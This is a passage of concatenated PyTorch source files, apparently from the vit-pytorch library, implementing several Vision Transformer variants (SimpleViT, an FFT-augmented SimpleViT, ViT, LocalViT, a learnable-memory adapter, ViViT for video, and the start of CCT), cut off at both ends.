dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b h w (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.patch_dropout = PatchDropout(patch_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): *_, h, w, dtype = *img.shape, img.dtype x = self.to_patch_embedding(img) pe = posemb_sincos_2d(x) x = rearrange(x, 'b ... d -> b (...) d') + pe x = self.patch_dropout(x) x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/simple_vit_with_fft.py import torch from torch.fft import fft2 from torch import nn from einops import rearrange, reduce, pack, unpack from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert (dim % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = 1.0 / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, freq_patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) freq_patch_height, freq_patch_width = pair(freq_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' assert image_height % freq_patch_height == 0 and image_width % freq_patch_width == 0, 'Image dimensions must be divisible by the freq patch size.' patch_dim = channels * patch_height * patch_width freq_patch_dim = channels * 2 * freq_patch_height * freq_patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.to_freq_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) ri -> b (h w) (p1 p2 ri c)", p1 = freq_patch_height, p2 = freq_patch_width), nn.LayerNorm(freq_patch_dim), nn.Linear(freq_patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim, ) self.freq_pos_embedding = posemb_sincos_2d( h = image_height // freq_patch_height, w = image_width // freq_patch_width, dim = dim ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): device, dtype = img.device, img.dtype x = self.to_patch_embedding(img) freqs = torch.view_as_real(fft2(img)) f = self.to_freq_embedding(freqs) x += self.pos_embedding.to(device, dtype = dtype) f += self.freq_pos_embedding.to(device, dtype = dtype) x, ps = pack((f, x), 'b * d') x = self.transformer(x) _, x = unpack(x, ps, 'b * d') x = reduce(x, 'b n d -> b d', 'mean') x = self.to_latent(x) return self.linear_head(x) if __name__ == '__main__': vit = SimpleViT( num_classes = 1000, image_size = 256, patch_size = 8, freq_patch_size = 8, dim = 1024, depth = 1, heads = 8, mlp_dim = 2048, ) images = torch.randn(8, 3, 256, 256) logits = vit(images) File: vit_pytorch/vit.py import torch from torch import nn from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Linear(dim, num_classes) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '1 1 d -> b 1 d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) x = x.mean(dim = 1) if self.pool == 'mean' else x[:, 0] x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/local_vit.py from math import sqrt import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # classes class Residual(nn.Module): def __init__(self, fn): super().__init__() self.fn = fn def forward(self, x, **kwargs): return self.fn(x, **kwargs) + x class ExcludeCLS(nn.Module): def __init__(self, fn): super().__init__() self.fn = fn def forward(self, x, **kwargs): cls_token, x = x[:, :1], x[:, 1:] x = self.fn(x, **kwargs) return torch.cat((cls_token, x), dim = 1) # feed forward related classes class DepthWiseConv2d(nn.Module): def __init__(self, dim_in, dim_out, kernel_size, padding, stride = 1, bias = True): super().__init__() self.net = nn.Sequential( nn.Conv2d(dim_in, dim_in, kernel_size = kernel_size, padding = padding, groups = dim_in, stride = stride, bias = bias), nn.Conv2d(dim_in, dim_out, kernel_size = 1, bias = bias) ) def forward(self, x): return self.net(x) class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Conv2d(dim, hidden_dim, 1), nn.Hardswish(), DepthWiseConv2d(hidden_dim, hidden_dim, 3, padding = 1), nn.Hardswish(), nn.Dropout(dropout), nn.Conv2d(hidden_dim, dim, 1), nn.Dropout(dropout) ) def forward(self, x): h = w = int(sqrt(x.shape[-2])) x = rearrange(x, 'b (h w) c -> b c h w', h = h, w = w) x = self.net(x) x = rearrange(x, 'b c h w -> b (h w) c') return x # attention class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x): b, n, _, h = *x.shape, self.heads x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = h), qkv) dots = einsum('b h i d, b h j d -> b h i j', q, k) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = einsum('b h i j, b h j d -> b h i d', attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Residual(Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout)), ExcludeCLS(Residual(FeedForward(dim, mlp_dim, dropout = dropout))) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) x = ff(x) return x # main class class LocalViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() assert image_size % patch_size == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_size // patch_size) ** 2 patch_dim = channels * patch_size ** 2 self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_size, p2 = patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def forward(self, img): x = self.to_patch_embedding(img) b, n, _ = x.shape cls_tokens = repeat(self.cls_token, '() n d -> b n d', b = b) x = torch.cat((cls_tokens, x), dim=1) x += self.pos_embedding[:, :(n + 1)] x = self.dropout(x) x = self.transformer(x) return self.mlp_head(x[:, 0]) File: vit_pytorch/learnable_memory_vit.py import torch from torch import nn import torch.nn.functional as F from einops import rearrange, repeat from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def pair(t): return t if isinstance(t, tuple) else (t, t) # controlling freezing of layers def set_module_requires_grad_(module, requires_grad): for param in module.parameters(): param.requires_grad = requires_grad def freeze_all_layers_(module): set_module_requires_grad_(module, False) def unfreeze_all_layers_(module): set_module_requires_grad_(module, True) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_q = nn.Linear(dim, inner_dim, bias = False) self.to_kv = nn.Linear(dim, inner_dim * 2, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) def forward(self, x, attn_mask = None, memories = None): x = self.norm(x) x_kv = x # input for key / values projection if exists(memories): # add memories to key / values if it is passed in memories = repeat(memories, 'n d -> b n d', b = x.shape[0]) if memories.ndim == 2 else memories x_kv = torch.cat((x_kv, memories), dim = 1) qkv = (self.to_q(x), *self.to_kv(x_kv).chunk(2, dim = -1)) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale if exists(attn_mask): dots = dots.masked_fill(~attn_mask, -torch.finfo(dots.dtype).max) attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x, attn_mask = None, memories = None): for ind, (attn, ff) in enumerate(self.layers): layer_memories = memories[ind] if exists(memories) else None x = attn(x, attn_mask = attn_mask, memories = layer_memories) + x x = ff(x) + x return x class ViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0.): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' num_patches = (image_height // patch_height) * (image_width // patch_width) patch_dim = channels * patch_height * patch_width assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.to_patch_embedding = nn.Sequential( Rearrange('b c (h p1) (w p2) -> b (h w) (p1 p2 c)', p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_patches + 1, dim)) self.cls_token = nn.Parameter(torch.randn(1, 1, dim)) self.dropout = nn.Dropout(emb_dropout) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim, dropout) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) def img_to_tokens(self, img): x = self.to_patch_embedding(img) cls_tokens = repeat(self.cls_token, '1 n d -> b n d', b = x.shape[0]) x = torch.cat((cls_tokens, x), dim = 1) x += self.pos_embedding x = self.dropout(x) return x def forward(self, img): x = self.img_to_tokens(img) x = self.transformer(x) cls_tokens = x[:, 0] return self.mlp_head(cls_tokens) # adapter with learnable memories per layer, memory CLS token, and learnable adapter head class Adapter(nn.Module): def __init__( self, *, vit, num_memories_per_layer = 10, num_classes = 2, ): super().__init__() assert isinstance(vit, ViT) # extract some model variables needed dim = vit.cls_token.shape[-1] layers = len(vit.transformer.layers) num_patches = vit.pos_embedding.shape[-2] self.vit = vit # freeze ViT backbone - only memories will be finetuned freeze_all_layers_(vit) # learnable parameters self.memory_cls_token = nn.Parameter(torch.randn(dim)) self.memories_per_layer = nn.Parameter(torch.randn(layers, num_memories_per_layer, dim)) self.mlp_head = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, num_classes) ) # specialized attention mask to preserve the output of the original ViT # it allows the memory CLS token to attend to all other tokens (and the learnable memory layer tokens), but not vice versa attn_mask = torch.ones((num_patches, num_patches), dtype = torch.bool) attn_mask = F.pad(attn_mask, (1, num_memories_per_layer), value = False) # main tokens cannot attend to learnable memories per layer attn_mask = F.pad(attn_mask, (0, 0, 1, 0), value = True) # memory CLS token can attend to everything self.register_buffer('attn_mask', attn_mask) def forward(self, img): b = img.shape[0] tokens = self.vit.img_to_tokens(img) # add task specific memory tokens memory_cls_tokens = repeat(self.memory_cls_token, 'd -> b 1 d', b = b) tokens = torch.cat((memory_cls_tokens, tokens), dim = 1) # pass memories along with image tokens through transformer for attending out = self.vit.transformer(tokens, memories = self.memories_per_layer, attn_mask = self.attn_mask) # extract memory CLS tokens memory_cls_tokens = out[:, 0] # pass through task specific adapter head return self.mlp_head(memory_cls_tokens) File: vit_pytorch/vivit.py import torch from torch import nn from einops import rearrange, repeat, reduce from einops.layers.torch import Rearrange # helpers def exists(val): return val is not None def pair(t): return t if isinstance(t, tuple) else (t, t) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim, dropout = 0.): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Dropout(dropout), nn.Linear(hidden_dim, dim), nn.Dropout(dropout) ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64, dropout = 0.): super().__init__() inner_dim = dim_head * heads project_out = not (heads == 1 and dim_head == dim) self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.dropout = nn.Dropout(dropout) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Sequential( nn.Linear(inner_dim, dim), nn.Dropout(dropout) ) if project_out else nn.Identity() def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) attn = self.dropout(attn) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class FactorizedTransformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim, dropout = 0.): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), Attention(dim, heads = heads, dim_head = dim_head, dropout = dropout), FeedForward(dim, mlp_dim, dropout = dropout) ])) def forward(self, x): b, f, n, _ = x.shape for spatial_attn, temporal_attn, ff in self.layers: x = rearrange(x, 'b f n d -> (b f) n d') x = spatial_attn(x) + x x = rearrange(x, '(b f) n d -> (b n) f d', b=b, f=f) x = temporal_attn(x) + x x = ff(x) + x x = rearrange(x, '(b n) f d -> b f n d', b=b, n=n) return self.norm(x) class ViT(nn.Module): def __init__( self, *, image_size, image_patch_size, frames, frame_patch_size, num_classes, dim, spatial_depth, temporal_depth, heads, mlp_dim, pool = 'cls', channels = 3, dim_head = 64, dropout = 0., emb_dropout = 0., variant = 'factorized_encoder', ): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(image_patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' assert frames % frame_patch_size == 0, 'Frames must be divisible by frame patch size' assert variant in ('factorized_encoder', 'factorized_self_attention'), f'variant = {variant} is not implemented' num_image_patches = (image_height // patch_height) * (image_width // patch_width) num_frame_patches = (frames // frame_patch_size) patch_dim = channels * patch_height * patch_width * frame_patch_size assert pool in {'cls', 'mean'}, 'pool type must be either cls (cls token) or mean (mean pooling)' self.global_average_pool = pool == 'mean' self.to_patch_embedding = nn.Sequential( Rearrange('b c (f pf) (h p1) (w p2) -> b f (h w) (p1 p2 pf c)', p1 = patch_height, p2 = patch_width, pf = frame_patch_size), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim) ) self.pos_embedding = nn.Parameter(torch.randn(1, num_frame_patches, num_image_patches, dim)) self.dropout = nn.Dropout(emb_dropout) self.spatial_cls_token = nn.Parameter(torch.randn(1, 1, dim)) if not self.global_average_pool else None if variant == 'factorized_encoder': self.temporal_cls_token = nn.Parameter(torch.randn(1, 1, dim)) if not self.global_average_pool else None self.spatial_transformer = Transformer(dim, spatial_depth, heads, dim_head, mlp_dim, dropout) self.temporal_transformer = Transformer(dim, temporal_depth, heads, dim_head, mlp_dim, dropout) elif variant == 'factorized_self_attention': assert spatial_depth == temporal_depth, 'Spatial and temporal depth must be the same for factorized self-attention' self.factorized_transformer = FactorizedTransformer(dim, spatial_depth, heads, dim_head, mlp_dim, dropout) self.pool = pool self.to_latent = nn.Identity() self.mlp_head = nn.Linear(dim, num_classes) self.variant = variant def forward(self, video): x = self.to_patch_embedding(video) b, f, n, _ = x.shape x = x + self.pos_embedding[:, :f, :n] if exists(self.spatial_cls_token): spatial_cls_tokens = repeat(self.spatial_cls_token, '1 1 d -> b f 1 d', b = b, f = f) x = torch.cat((spatial_cls_tokens, x), dim = 2) x = self.dropout(x) if self.variant == 'factorized_encoder': x = rearrange(x, 'b f n d -> (b f) n d') # attend across space x = self.spatial_transformer(x) x = rearrange(x, '(b f) n d -> b f n d', b = b) # excise out the spatial cls tokens or average pool for temporal attention x = x[:, :, 0] if not self.global_average_pool else reduce(x, 'b f n d -> b f d', 'mean') # append temporal CLS tokens if exists(self.temporal_cls_token): temporal_cls_tokens = repeat(self.temporal_cls_token, '1 1 d-> b 1 d', b = b) x = torch.cat((temporal_cls_tokens, x), dim = 1) # attend across time x = self.temporal_transformer(x) # excise out temporal cls token or average pool x = x[:, 0] if not self.global_average_pool else reduce(x, 'b f d -> b d', 'mean') elif self.variant == 'factorized_self_attention': x = self.factorized_transformer(x) x = x[:, 0, 0] if not self.global_average_pool else reduce(x, 'b f n d -> b d', 'mean') x = self.to_latent(x) return self.mlp_head(x) File: vit_pytorch/simple_vit.py import torch from torch import nn from einops import rearrange from einops.layers.torch import Rearrange # helpers def pair(t): return t if isinstance(t, tuple) else (t, t) def posemb_sincos_2d(h, w, dim, temperature: int = 10000, dtype = torch.float32): y, x = torch.meshgrid(torch.arange(h), torch.arange(w), indexing="ij") assert (dim % 4) == 0, "feature dimension must be multiple of 4 for sincos emb" omega = torch.arange(dim // 4) / (dim // 4 - 1) omega = 1.0 / (temperature ** omega) y = y.flatten()[:, None] * omega[None, :] x = x.flatten()[:, None] * omega[None, :] pe = torch.cat((x.sin(), x.cos(), y.sin(), y.cos()), dim=1) return pe.type(dtype) # classes class FeedForward(nn.Module): def __init__(self, dim, hidden_dim): super().__init__() self.net = nn.Sequential( nn.LayerNorm(dim), nn.Linear(dim, hidden_dim), nn.GELU(), nn.Linear(hidden_dim, dim), ) def forward(self, x): return self.net(x) class Attention(nn.Module): def __init__(self, dim, heads = 8, dim_head = 64): super().__init__() inner_dim = dim_head * heads self.heads = heads self.scale = dim_head ** -0.5 self.norm = nn.LayerNorm(dim) self.attend = nn.Softmax(dim = -1) self.to_qkv = nn.Linear(dim, inner_dim * 3, bias = False) self.to_out = nn.Linear(inner_dim, dim, bias = False) def forward(self, x): x = self.norm(x) qkv = self.to_qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) dots = torch.matmul(q, k.transpose(-1, -2)) * self.scale attn = self.attend(dots) out = torch.matmul(attn, v) out = rearrange(out, 'b h n d -> b n (h d)') return self.to_out(out) class Transformer(nn.Module): def __init__(self, dim, depth, heads, dim_head, mlp_dim): super().__init__() self.norm = nn.LayerNorm(dim) self.layers = nn.ModuleList([]) for _ in range(depth): self.layers.append(nn.ModuleList([ Attention(dim, heads = heads, dim_head = dim_head), FeedForward(dim, mlp_dim) ])) def forward(self, x): for attn, ff in self.layers: x = attn(x) + x x = ff(x) + x return self.norm(x) class SimpleViT(nn.Module): def __init__(self, *, image_size, patch_size, num_classes, dim, depth, heads, mlp_dim, channels = 3, dim_head = 64): super().__init__() image_height, image_width = pair(image_size) patch_height, patch_width = pair(patch_size) assert image_height % patch_height == 0 and image_width % patch_width == 0, 'Image dimensions must be divisible by the patch size.' patch_dim = channels * patch_height * patch_width self.to_patch_embedding = nn.Sequential( Rearrange("b c (h p1) (w p2) -> b (h w) (p1 p2 c)", p1 = patch_height, p2 = patch_width), nn.LayerNorm(patch_dim), nn.Linear(patch_dim, dim), nn.LayerNorm(dim), ) self.pos_embedding = posemb_sincos_2d( h = image_height // patch_height, w = image_width // patch_width, dim = dim, ) self.transformer = Transformer(dim, depth, heads, dim_head, mlp_dim) self.pool = "mean" self.to_latent = nn.Identity() self.linear_head = nn.Linear(dim, num_classes) def forward(self, img): device = img.device x = self.to_patch_embedding(img) x += self.pos_embedding.to(device, dtype=x.dtype) x = self.transformer(x) x = x.mean(dim = 1) x = self.to_latent(x) return self.linear_head(x) File: vit_pytorch/cct_3d.py import torch from torch import nn, einsum import torch.nn.functional as F from einops import rearrange, repeat # helpers def exists(val): return val is not None def default(val, d): return val if exists(val) else d def pair(t): return t if isinstance(t, tuple) else (t, t) # CCT Models __all__ = ['cct_2', 'cct_4', 'cct_6', 'cct_7', 'cct_8', 'cct_14', 'cct_16'] def cct_2(*args, **kwargs): return _cct(num_layers=2, num_heads=2, mlp_ratio=1, embedding_dim=128, *args, **kwargs) def cct_4(*args, **kwargs): return _cct(num_layers=4, num_heads=2, mlp_ratio=1, embedding_dim=128, *args, **kwargs) def cct_6(*args, **kwargs): return _cct(num_layers=6, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_7(*args, **kwargs): return _cct(num_layers=7, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_8(*args, **kwargs): return _cct(num_layers=8, num_heads=4, mlp_ratio=2, embedding_dim=256, *args, **kwargs) def cct_14(*args, **kwargs): return _cct(num_layers=14, num_heads=6, mlp_ratio=3, embedding_dim=384, *args, **kwargs) def cct_16(*args, **kwargs): return _cct(num_layers=16, num_heads=6, mlp_ratio=3, embedding_dim=384, *args, **kwargs) def _cct(num_layers, num_heads, mlp_ratio, embedding_dim, kernel_size=3, stride=None, padding=None, *args, **kwargs): stride = default(stride, max(1, (kernel_size // 2) - 1)) padding = default(padding, max(1, (kernel_size // 2))) return CCT(num_layers=num_layers, num_heads=num_heads, mlp_ratio=mlp_ratio, embedding_dim=embedding_dim, kernel_size=kernel_size, stride=stride, padding=padding, *args, **kwargs) # positional def sinusoidal_embedding(n_channels, dim): pe = torch.FloatTensor([[p / (10000 ** (2 * (i // 2) / dim)) for i in range(dim)] for p in range(n_channels)]) pe[:, 0::2] = torch.sin(pe[:, 0::2]) pe[:, 1::2] = torch.cos(pe[:, 1::2]) return rearrange(pe, '... -> 1 ...') # modules class Attention(nn.Module): def __init__(self, dim, num_heads=8, attention_dropout=0.1, projection_dropout=0.1): super().__init__() self.heads = num_heads head_dim = dim // self.heads self.scale = head_dim ** -0.5 self.qkv = nn.Linear(dim, dim * 3, bias=False) self.attn_drop = nn.Dropout(attention_dropout) self.proj = nn.Linear(dim, dim) self.proj_drop = nn.Dropout(projection_dropout) def forward(self, x): B, N, C = x.shape qkv = self.qkv(x).chunk(3, dim = -1) q, k, v = map(lambda t: rearrange(t, 'b n (h d) -> b h n d', h = self.heads), qkv) q = q * self.scale attn = einsum('b h i d, b h j d -> b h i j', q, k) attn = attn.softmax(dim=-1) attn = self.attn_drop(attn) x = einsum('b h i j, b h j d -> b h i d', attn, v) x = rearrange(x, 'b h n d -> b n (h d)') return self.proj_drop(self.proj(x)) class TransformerEncoderLayer(nn.Module): """ Inspired by torch.nn.TransformerEncoderLayer and rwightman's timm package. """ def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, attention_dropout=0.1, drop_path_rate=0.1): super().__init__() self.pre_norm = nn.LayerNorm(d_model) self.self_attn = Attention(dim=d_model, num_heads=nhead, attention_dropout=attention_dropout, projection_dropout=dropout) self.linear1 = nn.Linear(d_model, dim_feedforward) self.dropout1 = nn.Dropout(dropout) self.norm1 = nn.LayerNorm(d_model) self.linear2 = nn.Linear(dim_feedforward, d_model) self.dropout2 = nn.Dropout(dropout) self.drop_path = DropPath(drop_path_rate) self.activation = F.gelu def forward(self, src, *args, **kwargs): src = src + self.drop_path(self.self_attn(self.pre_norm(src))) src = self.norm1(src) src2 = self.linear2(self.dropout1(self.activation(self.linear1(src)))) src = src + self.drop_path(self.dropout2(src2)) return src class 